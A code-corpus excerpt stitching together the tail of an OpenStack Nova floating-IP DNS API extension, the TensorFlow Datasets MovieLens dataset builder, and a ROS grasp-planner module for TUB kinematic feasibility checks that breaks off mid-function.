class DomainsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entries')
elem = xmlutil.SubTemplateElement(root, 'domain_entry',
selector='domain_entries')
make_domain_entry(elem)
return xmlutil.MasterTemplate(root, 1)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
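# A minimal illustration of the unquoting behaviour (hypothetical inputs):
#
#     >>> _unquote_domain('example%2Ecom')
#     'example.com'
#     >>> _unquote_domain('example%252Ecom')   # double-quoted dot: %252E -> %2E -> .
#     'example.com'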
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSDomainController, self).__init__()
@wsgi.serializers(xml=DomainsTemplate)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
domains = self.network_api.get_dns_domains(context)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@wsgi.serializers(xml=DomainTemplate)
def update(self, req, id, body):
"""Add or modify domain entry"""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
def delete(self, req, id):
"""Delete the domain identified by id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSEntryController, self).__init__()
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
entry = _create_dns_entry(entries[0], name, domain)
return _translate_dns_entry_view(entry)
@wsgi.serializers(xml=FloatingIPDNSsTemplate)
def index(self, req, domain_id):
"""Return a list of dns entries for the specified domain and ip."""
context = req.environ['nova.context']
authorize(context)
params = req.GET
floating_ip = params.get('ip')
domain = _unquote_domain(domain_id)
if not floating_ip:
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
return _translate_dns_entries_view(entrylist)
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def update(self, req, domain_id, id, body):
"""Add or modify dns entry"""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name, address, domain)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class Floating_ip_dns(extensions.ExtensionDescriptor):
"""Floating IP DNS support"""
name = "Floating_ip_dns"
alias = "os-floating-ip-dns"
namespace = "http://docs.openstack.org/ext/floating_ip_dns/api/v1.1"
updated = "2011-12-23T00:00:00+00:00"
def __init__(self, ext_mgr):
self.network_api = network.API()
super(Floating_ip_dns, self).__init__(ext_mgr)
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-dns',
FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
| apache-2.0 | 3,639,136,114,536,705,000 | 34.547541 | 78 | 0.590481 | false |
tensorflow/datasets | tensorflow_datasets/structured/movielens.py | 1 | 17907 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MovieLens dataset."""
import os
import textwrap
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.structured import movielens_parsing
_CITATION = """
@article{10.1145/2827872,
author = {Harper, F. Maxwell and Konstan, Joseph A.},
title = {The MovieLens Datasets: History and Context},
year = {2015},
issue_date = {January 2016},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {5},
number = {4},
issn = {2160-6455},
url = {https://doi.org/10.1145/2827872},
doi = {10.1145/2827872},
journal = {ACM Trans. Interact. Intell. Syst.},
month = dec,
articleno = {19},
numpages = {19},
keywords = {Datasets, recommendations, ratings, MovieLens}
}
"""
_DESCRIPTION = """
This dataset contains a set of movie ratings from the MovieLens website, a movie
recommendation service. This dataset was collected and maintained by [GroupLens]
(https://grouplens.org/), a research group at the University of Minnesota. There
are 5 versions included: "25m", "latest-small", "100k", "1m", "20m". In all
datasets, the movies data and ratings data are joined on "movieId". The 25m
dataset, latest-small dataset, and 20m dataset contain only movie data and
rating data. The 1m dataset and 100k dataset contain demographic data in
addition to movie and rating data.
- "25m": This is the latest stable version of the MovieLens dataset. It is
recommended for research purposes.
- "latest-small": This is a small subset of the latest version of the MovieLens
dataset. It is changed and updated over time by GroupLens.
- "100k": This is the oldest version of the MovieLens datasets. It is a small
dataset with demographic data.
- "1m": This is the largest MovieLens dataset that contains demographic data.
- "20m": This is one of the most used MovieLens datasets in academic papers
along with the 1m dataset.
For each version, users can view either only the movies data by adding the
"-movies" suffix (e.g. "25m-movies") or the ratings data joined with the movies
data (and users data in the 1m and 100k datasets) by adding the "-ratings"
suffix (e.g. "25m-ratings").
The features below are included in all versions with the "-ratings" suffix.
- "movie_id": a unique identifier of the rated movie
- "movie_title": the title of the rated movie with the release year in
parentheses
- "movie_genres": a sequence of genres to which the rated movie belongs
- "user_id": a unique identifier of the user who made the rating
- "user_rating": the score of the rating on a five-star scale
- "timestamp": the timestamp of the ratings, represented in seconds since
midnight Coordinated Universal Time (UTC) of January 1, 1970
The "100k-ratings" and "1m-ratings" versions in addition include the following
demographic features.
- "user_gender": gender of the user who made the rating; a true value
corresponds to male
- "bucketized_user_age": bucketized age values of the user who made the rating,
the values and the corresponding ranges are:
- 1: "Under 18"
- 18: "18-24"
- 25: "25-34"
- 35: "35-44"
- 45: "45-49"
- 50: "50-55"
- 56: "56+"
- "user_occupation_label": the occupation of the user who made the rating
represented by an integer-encoded label; labels are preprocessed to be
consistent across different versions
- "user_occupation_text": the occupation of the user who made the rating in
the original string; different versions can have different set of raw text
labels
- "user_zip_code": the zip code of the user who made the rating
In addition, the "100k-ratings" dataset also includes a "raw_user_age" feature,
which is the exact age of the user who made the rating.
Datasets with the "-movies" suffix contain only "movie_id", "movie_title", and
"movie_genres" features.
"""
_FORMAT_VERSIONS = ['25m', 'latest-small', '20m', '100k', '1m']
_TABLE_OPTIONS = ['movies', 'ratings']
class MovieLensConfig(tfds.core.BuilderConfig):
"""BuilderConfig for MovieLens dataset."""
def __init__(self,
format_version: Optional[str] = None,
table_option: Optional[str] = None,
download_url: Optional[str] = None,
parsing_fn: Optional[Callable[[str], Iterator[Tuple[int, Dict[
str, Any]]],]] = None,
**kwargs) -> None:
"""Constructs a MovieLensConfig.
Args:
format_version: a string to identify the format of the dataset, one of
'_FORMAT_VERSIONS'.
table_option: a string to identify the table to expose, one of
'_TABLE_OPTIONS'.
download_url: a string url for downloading the dataset.
parsing_fn: a callable for parsing the data.
**kwargs: keyword arguments forwarded to super.
Raises:
ValueError: if format_version is not one of '_FORMAT_VERSIONS' or if
table_option is not one of '_TABLE_OPTIONS'.
"""
if format_version not in _FORMAT_VERSIONS:
raise ValueError('format_version must be one of %s.' % _FORMAT_VERSIONS)
if table_option not in _TABLE_OPTIONS:
raise ValueError('table_option must be one of %s.' % _TABLE_OPTIONS)
super(MovieLensConfig, self).__init__(**kwargs)
self._format_version = format_version
self._table_option = table_option
self._download_url = download_url
self._parsing_fn = parsing_fn
@property
def format_version(self) -> str:
return self._format_version
@property
def table_option(self) -> str:
return self._table_option
@property
def download_url(self) -> str:
return self._download_url
@property
def parsing_fn(
self) -> Optional[Callable[[str], Iterator[Tuple[int, Dict[str, Any]]],]]:
return self._parsing_fn
class Movielens(tfds.core.GeneratorBasedBuilder):
"""MovieLens rating dataset."""
BUILDER_CONFIGS = [
MovieLensConfig(
name='25m-ratings',
description=textwrap.dedent("""\
This dataset contains 25,000,095 ratings across 62,423 movies,
created by 162,541 users between January 09, 1995 and November 21,
2019. This dataset is the latest stable version of the MovieLens
dataset, generated on November 21, 2019.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='25m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='25m-movies',
description=textwrap.dedent("""\
This dataset contains data of 62,423 movies rated in the 25m
dataset."""),
version='0.1.0',
format_version='25m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
# The latest-small dataset is changed over time. Its checksum might need
# updating in the future.
MovieLensConfig(
name='latest-small-ratings',
description=textwrap.dedent("""\
This dataset contains 100,836 ratings across 9,742 movies, created
by 610 users between March 29, 1996 and September 24, 2018. This
          dataset is generated on September 26, 2018 and is a subset of
the full latest version of the MovieLens dataset. This dataset
is changed and updated over time.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='latest-small',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='latest-small-movies',
description=textwrap.dedent("""\
This dataset contains data of 9,742 movies rated in the
latest-small dataset."""),
version='0.1.0',
format_version='latest-small',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
MovieLensConfig(
name='100k-ratings',
description=textwrap.dedent("""\
This dataset contains 100,000 ratings from 943 users on 1,682
movies. This dataset is the oldest version of the MovieLens
dataset.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. This dataset contains demographic data of users in
addition to data on movies and ratings."""),
version='0.1.0',
format_version='100k',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_ratings_data,
),
MovieLensConfig(
name='100k-movies',
description=textwrap.dedent("""\
This dataset contains data of 1,682 movies rated in the 100k
dataset."""),
version='0.1.0',
format_version='100k',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_movies_data,
),
MovieLensConfig(
name='1m-ratings',
description=textwrap.dedent("""\
This dataset contains 1,000,209 anonymous ratings of approximately
3,900 movies made by 6,040 MovieLens users who joined MovieLens in
2000. This dataset is the largest dataset that includes
demographic data.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. In demographic data, age values are divided into
ranges and the lowest age value for each range is used in the data
instead of the actual values."""),
version='0.1.0',
format_version='1m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_ratings_data,
),
MovieLensConfig(
name='1m-movies',
description=textwrap.dedent("""\
This dataset contains data of approximately 3,900 movies rated in
the 1m dataset."""),
version='0.1.0',
format_version='1m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_movies_data,
),
MovieLensConfig(
name='20m-ratings',
description=textwrap.dedent("""\
This dataset contains 20,000,263 ratings across 27,278
movies, created by 138,493 users between January 09, 1995 and
March 31, 2015. This dataset was generated on October 17, 2016.
Each user has rated at least 20 movies. Ratings are in half-star
increments. This dataset does not contain demographic data."""),
version='0.1.0',
format_version='20m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='20m-movies',
description=textwrap.dedent("""\
This dataset contains data of 27,278 movies rated in the 20m
dataset"""),
version='0.1.0',
format_version='20m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
]
VERSION = tfds.core.Version('0.1.0')
def _info(self) -> tfds.core.DatasetInfo:
"""Returns DatasetInfo according to self.builder_config."""
movie_features_dict = {
'movie_id':
tf.string,
'movie_title':
tf.string,
'movie_genres':
tfds.features.Sequence(
tfds.features.ClassLabel(names=[
'Action',
'Adventure',
'Animation',
'Children',
'Comedy',
'Crime',
'Documentary',
'Drama',
'Fantasy',
'Film-Noir',
'Horror',
'IMAX',
'Musical',
'Mystery',
'Romance',
'Sci-Fi',
'Thriller',
'Unknown',
'War',
'Western',
'(no genres listed)',
]),),
}
rating_features_dict = {
'user_id': tf.string,
'user_rating': tf.float32,
# Using int64 since tfds currently does not support float64.
'timestamp': tf.int64,
}
demographic_features_dict = {
'user_gender':
tf.bool,
'bucketized_user_age':
tf.float32,
'user_occupation_label':
tfds.features.ClassLabel(names=[
'academic/educator',
'artist',
'clerical/admin',
'customer service',
'doctor/health care',
'entertainment',
'executive/managerial',
'farmer',
'homemaker',
'lawyer',
'librarian',
'other/not specified',
'programmer',
'retired',
'sales/marketing',
'scientist',
'self-employed',
'student',
'technician/engineer',
'tradesman/craftsman',
'unemployed',
'writer',
]),
'user_occupation_text':
tf.string,
'user_zip_code':
tf.string,
}
features_dict = {}
if self.builder_config.table_option == 'movies':
features_dict.update(movie_features_dict)
# For the other cases, self.builder_config.table_option == 'ratings'.
# Older versions of MovieLens (1m, 100k) have demographic features.
elif self.builder_config.format_version == '1m':
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
elif self.builder_config.format_version == '100k':
# Only the 100k dataset contains exact user ages. The 1m dataset
# contains only bucketized age values.
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
features_dict.update(raw_user_age=tf.float32)
else:
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict(features_dict),
supervised_keys=None,
homepage='https://grouplens.org/datasets/movielens/',
citation=_CITATION,
)
def _split_generators(
self, dl_manager: tfds.download.DownloadManager
) -> List[tfds.core.SplitGenerator]:
"""Returns SplitGenerators."""
extracted_path = dl_manager.download_and_extract(
self.builder_config.download_url,)
dir_path = os.path.join(
extracted_path,
'ml-%s' % self.builder_config.format_version,
)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={'dir_path': dir_path},
),
]
def _generate_examples(
self,
dir_path: Optional[str] = None) -> Iterator[Tuple[int, Dict[str, Any]]]:
"""Yields examples by calling the corresponding parsing function."""
for ex in self.builder_config.parsing_fn(dir_path):
yield ex
class MovieLens(Movielens):
"""MovieLens rating dataset (deprecated handle version)."""
def __init__(self, **kwargs):
logging.warning(
'The handle "movie_lens" for the MovieLens dataset is deprecated. '
'Prefer using "movielens" instead.')
super(MovieLens, self).__init__(**kwargs)
| apache-2.0 | 1,772,383,642,943,722,500 | 37.592672 | 80 | 0.612833 | false |
SoMa-Project/ec_grasp_planner | ec_grasp_planner/src/tub_feasibility_check_interface.py | 1 | 30753 | import math
import rospy
import numpy as np
from tf import transformations as tra
from geometry_graph_msgs.msg import Node, geometry_msgs
from tub_feasibility_check import srv as kin_check_srv
from tub_feasibility_check.msg import BoundingBoxWithPose, AllowedCollision
from tub_feasibility_check.srv import CheckKinematicsResponse
from shape_msgs.msg import SolidPrimitive
import GraspFrameRecipes
import planner_utils as pu
class AlternativeBehavior:
# TODO this class should be adapted if return value of the feasibility check changes (e.g. switch conditions)
def __init__(self, feasibility_check_result, init_conf):
self.number_of_joints = len(feasibility_check_result.final_configuration)
self.trajectory_steps = []
for i in range(0, len(feasibility_check_result.trajectory), self.number_of_joints):
self.trajectory_steps.append(feasibility_check_result.trajectory[i:i+self.number_of_joints])
if np.allclose(init_conf, self.trajectory_steps[0]):
rospy.logwarn("Initial configuration {0} is first point in trajectory".format(init_conf))
# :1 = skip the initial position TODO remove if relative is used!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
self.trajectory_steps = self.trajectory_steps[1:]
def assert_that_initial_config_not_included(self, init_conf):
if np.allclose(init_conf, self.trajectory_steps[0]):
raise ValueError("Initial configuration {0} is first point in trajectory".format(init_conf))
def get_trajectory(self):
print("get_trajectory LEN:", len(self.trajectory_steps))
return np.transpose(np.array(self.trajectory_steps))
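# Shape note (editorial addition, not part of the original module): the flat
# `trajectory` field of the feasibility result is split above into consecutive
# joint configurations of `number_of_joints` values each, so get_trajectory()
# returns a (number_of_joints x number_of_steps) numpy array with one column
# per trajectory point.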
class FeasibilityQueryParameters:
def __init__(self, checked_motions, goals, allowed_collisions, goal_manifold_frames, goal_manifold_orientations):
# TODO change multiple dictionaries to one Motion class?
# This list includes the checked motions in order (They have to be sequential!)
self.checked_motions = checked_motions
# The goal poses of the respective motions in op-space (index has to match index of checked_motions)
self.goals = goals
# The collisions that are allowed in message format per motion
self.allowed_collisions = allowed_collisions
# TODO docu
self.goal_manifold_frames = goal_manifold_frames
# TODO docu
self.goal_manifold_orientations = goal_manifold_orientations
def get_matching_ifco_wall(ifco_in_base_transform, ec_frame):
# transforms points in base frame to ifco frame
base_in_ifco_transform = tra.inverse_matrix(ifco_in_base_transform)
# ec x axis in ifco frame
ec_x_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 0]
ec_z_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 2]
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.1
# one could also check for dot-product = 0 instead of using the x-axis but this is prone to the same errors
if ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_x_axis.dot(np.array([0, 1, 0])) > space_thresh:
# print("GET MATCHING=SOUTH", tf_dbg_call_to_string(ec_frame, frame_name='ifco_south'))
return 'south'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_x_axis.dot(np.array([0, 1, 0])) < -space_thresh:
# print("GET MATCHING=NORTH", tf_dbg_call_to_string(ec_frame, frame_name='ifco_north'))
return 'north'
elif ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh and ec_x_axis.dot(np.array([1, 0, 0])) > space_thresh:
# print("GET MATCHING=WEST", tf_dbg_call_to_string(ec_frame, frame_name='ifco_west'))
return 'west'
elif ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh and ec_x_axis.dot(np.array([1, 0, 0])) < -space_thresh:
# print("GET MATCHING=EAST", tf_dbg_call_to_string(ec_frame, frame_name='ifco_east'))
return 'east'
else:
# This should never be reached. Just here to prevent bugs
raise ValueError("ERROR: Could not identify matching ifco wall. Check frames!")
def get_matching_ifco_corner(ifco_in_base_transform, ec_frame):
# transforms points in base frame to ifco frame
base_in_ifco_transform = tra.inverse_matrix(ifco_in_base_transform)
# ec (corner) z-axis in ifco frame
ec_z_axis = base_in_ifco_transform.dot(ec_frame)[0:3, 2]
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.0 # 0.1
if ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh:
print("GET MATCHING=SOUTH_EAST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_southeast'))
return 'south', 'east'
elif ec_z_axis.dot(np.array([1, 0, 0])) > space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh:
print("GET MATCHING=SOUTH_WEST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_southwest'))
return 'south', 'west'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) < -space_thresh:
print("GET MATCHING=NORTH_WEST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_northwest'))
return 'north', 'west'
elif ec_z_axis.dot(np.array([1, 0, 0])) < -space_thresh and ec_z_axis.dot(np.array([0, 1, 0])) > space_thresh:
print("GET MATCHING=NORTH_EAST", pu.tf_dbg_call_to_string(ec_frame, frame_name='ifco_northeast'))
return 'north', 'east'
else:
# This should never be reached. Just here to prevent bugs
        raise ValueError("ERROR: Could not identify matching ifco corner. Check frames!")
# Checks if the Y-Axis of the ifco frame points towards the robot (origin of base frame)
# The base frame is assumed to be the following way:
# x points to the robots front
# y points to the robots left (if you are behind the robot)
# z points upwards
def ifco_transform_needs_to_be_flipped(ifco_in_base_transform):
# we can't check for zero because of small errors in the frame (due to vision or numerical uncertainty)
space_thresh = 0.05
x_of_yaxis = ifco_in_base_transform[0, 1]
x_of_translation = ifco_in_base_transform[0, 3]
print(ifco_in_base_transform)
print(space_thresh, x_of_yaxis, x_of_translation)
if x_of_translation > space_thresh:
# ifco is in front of robot
return x_of_yaxis > 0
    elif x_of_translation < -space_thresh:
# ifco is behind the robot
return x_of_yaxis < 0
else:
y_of_translation = ifco_in_base_transform[1, 3]
y_of_yaxis = ifco_in_base_transform[1, 1]
if y_of_translation < 0:
# ifco is to the right of the robot
return y_of_yaxis < 0
else:
# ifco is to the left of the robot
return y_of_yaxis > 0
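# Minimal usage sketch for ifco_transform_needs_to_be_flipped (editorial
# addition, not part of the original module): an ifco standing 1 m in front of
# the robot with its y-axis pointing along the robot's +x axis (i.e. away from
# the robot) has to be flipped before calling the feasibility checker:
#
#   ifco_in_base = tra.translation_matrix([1.0, 0, 0]).dot(
#       tra.rotation_matrix(math.radians(-90.0), [0, 0, 1]))
#   assert ifco_transform_needs_to_be_flipped(ifco_in_base)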
# This function will call TUB's feasibility checker to check a motion.
# If the motion is not feasible it will try to generate an alternative joint trajectory and place it into
# the given stored_trajectories argument (dictionary).
def check_kinematic_feasibility(current_object_idx, objects, object_params, current_ec_index, strategy, all_ec_frames,
ifco_in_base_transform, handarm_params, stored_trajectories):
if handarm_params is None:
raise ValueError("HandArmParameters can't be None, check callstack!")
print("IFCO_BEFORE", pu.tf_dbg_call_to_string(ifco_in_base_transform, frame_name='ifco_before'))
if ifco_transform_needs_to_be_flipped(ifco_in_base_transform):
# flip the ifco transform such that it fulfills the requirements of the feasibilty checker
# (y-axis of ifco points towards the robot)
rospy.loginfo("Flip ifco transform for tub feasibilty checker")
zflip_transform = tra.rotation_matrix(math.radians(180.0), [0, 0, 1])
ifco_in_base_transform = ifco_in_base_transform.dot(zflip_transform)
print("IFCO_AFTER", pu.tf_dbg_call_to_string(ifco_in_base_transform, frame_name='ifco_after'))
object = objects[current_object_idx]
ec_frame = all_ec_frames[current_ec_index]
if object['type'] in handarm_params[strategy]:
params = handarm_params[strategy][object['type']]
else:
params = handarm_params[strategy]['object']
# The initial joint configuration (goToView config)
# curr_start_config = rospy.get_param('planner_gui/robot_view_position') # TODO use current joint state instead?
# TODO also check gotToView -> params['initial_goal'] (requires forward kinematics, or change to op-space)
curr_start_config = params['initial_goal']
if strategy == 'SurfaceGrasp':
call_params = prepare_surface_grasp_parameter(objects, current_object_idx, object_params, params)
elif strategy == "WallGrasp":
selected_wall_name = get_matching_ifco_wall(ifco_in_base_transform, ec_frame)
print("FOUND_EC: ", selected_wall_name)
blocked_ecs = ['north', 'east', 'west'] # TODO move to config file?
if selected_wall_name in blocked_ecs:
rospy.loginfo("Skipped wall " + selected_wall_name + " (Blacklisted)")
return 0
call_params = prepare_wall_grasp_parameter(ec_frame, selected_wall_name, objects, current_object_idx,
object_params, ifco_in_base_transform, params)
elif strategy == "CornerGrasp":
selected_wall_names = get_matching_ifco_corner(ifco_in_base_transform, ec_frame)
print("FOUND_EC: ", selected_wall_names)
blocked_ecs = [('north', 'east'), ('north', 'west'), ('south', 'west')] # TODO move to config file?
if selected_wall_names in blocked_ecs:
rospy.loginfo("Skipped corner " + selected_wall_names[0] + selected_wall_names[1] + " (Blacklisted)")
return 0
call_params = prepare_corner_grasp_parameter(ec_frame, selected_wall_names, objects, current_object_idx,
object_params, ifco_in_base_transform, params)
else:
raise ValueError("Kinematics checks are currently only supported for surface, wall and corner grasps, "
"but strategy was " + strategy)
# initialize stored trajectories for the given object
stored_trajectories[(current_object_idx, current_ec_index)] = {}
# The pose of the ifco (in base frame) in message format
ifco_pose = pu.transform_to_pose_msg(ifco_in_base_transform)
print("IFCO_POSE", ifco_pose)
# The bounding boxes of all objects in message format
bounding_boxes = []
for obj in objects:
obj_pose = pu.transform_to_pose_msg(obj['frame'])
obj_bbox = SolidPrimitive(type=SolidPrimitive.BOX,
dimensions=[obj['bounding_box'].x, obj['bounding_box'].y, obj['bounding_box'].z])
bounding_boxes.append(BoundingBoxWithPose(box=obj_bbox, pose=obj_pose))
print("BOUNDING_BOXES", bounding_boxes)
all_steps_okay = True
# perform the actual checks
for motion, curr_goal in zip(call_params.checked_motions, call_params.goals):
manifold_name = motion + '_manifold'
goal_pose = pu.transform_to_pose_msg(curr_goal)
print("GOAL_POSE", goal_pose)
print("INIT_CONF", curr_start_config)
goal_manifold_frame = pu.transform_to_pose_msg(call_params.goal_manifold_frames[motion])
goal_manifold_orientation = geometry_msgs.msg.Quaternion(x=call_params.goal_manifold_orientations[motion][0],
y=call_params.goal_manifold_orientations[motion][1],
z=call_params.goal_manifold_orientations[motion][2],
w=call_params.goal_manifold_orientations[motion][3])
check_feasibility = rospy.ServiceProxy('/check_kinematics', kin_check_srv.CheckKinematics)
print("allowed", call_params.allowed_collisions[motion])
print("Call check kinematics for " + motion + " (" + strategy + ")\nGoal:\n" + str(curr_goal))
res = check_feasibility(initial_configuration=curr_start_config,
goal_pose=goal_pose,
ifco_pose=ifco_pose,
bounding_boxes_with_poses=bounding_boxes,
goal_manifold_frame=goal_manifold_frame,
min_position_deltas=params[manifold_name]['min_position_deltas'],
max_position_deltas=params[manifold_name]['max_position_deltas'],
goal_manifold_orientation=goal_manifold_orientation,
min_orientation_deltas=params[manifold_name]['min_orientation_deltas'],
max_orientation_deltas=params[manifold_name]['max_orientation_deltas'],
allowed_collisions=call_params.allowed_collisions[motion]
)
print("check feasibility result was: " + str(res.status))
if res.status == CheckKinematicsResponse.FAILED:
# trajectory is not feasible and no alternative was found, directly return 0
return 0
elif res.status == CheckKinematicsResponse.REACHED_SAMPLED:
# original trajectory is not feasible, but alternative was found => save it
stored_trajectories[(current_object_idx, current_ec_index)][motion] = AlternativeBehavior(res, curr_start_config)
curr_start_config = res.final_configuration
all_steps_okay = False
print("FOUND ALTERNATIVE. New Start: ", curr_start_config)
elif res.status == CheckKinematicsResponse.REACHED_INITIAL:
# original trajectory is feasible, we save the alternative in case a later motion is not possible.
stored_trajectories[(current_object_idx, current_ec_index)][motion] = AlternativeBehavior(res, curr_start_config)
curr_start_config = res.final_configuration
